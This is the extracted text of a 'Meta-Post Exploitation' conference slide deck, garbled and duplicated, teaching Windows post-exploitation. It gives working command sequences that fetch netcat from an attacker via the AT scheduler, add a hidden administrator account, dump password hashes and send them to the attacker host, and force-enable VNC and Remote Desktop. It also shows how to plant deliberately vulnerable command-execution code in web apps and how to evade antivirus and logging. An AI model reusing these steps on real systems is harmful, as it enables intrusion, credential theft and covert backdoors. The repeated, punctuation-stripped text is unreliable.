[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 12
Manual Password Management
bull Existing Toolsndash L0phtCrack
bull Stores passwords in session filesndash CainampAbel
bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)
ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability
ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable
Slide 13
Slide 14
bull MetaPassbull Demos
Slide 15
Persistence
Slide 16
A word on Stealth vs Persistence
ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 13
Slide 14
bull MetaPassbull Demos
Slide 15
Persistence
Slide 16
A word on Stealth vs Persistence
ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand
Slide 17
Persistence
bull Persistence is maintaining accessbull Why
ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the
targetndash Targetrsquos usefulness not always immediately known
bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter
Slide 18
Persistence
bull Stages of Persistencendash Initial access
bull Exploitbull Stolen password etc
ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent
ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught
bull When you no longer need the target leave no trace
Slide 19
Persistence
bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd
modifications process injection stealing credentials etc
Slide 20
Persistence
bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities
bull Hard to determine maliciousnessbull We all know its hard to find bugs now
imagine someone is purposefully putting the bugs in
Slide 21
Persistence
bull Leveraging existing persistent admin access
bull Nagios checksbull Attack Configuration Management
ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo
them with our trojans)bull GUIrsquos
bull Tool distribution
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 14
bull MetaPassbull Demos
Slide 15
Persistence
Slide 16
A word on Stealth vs Persistence
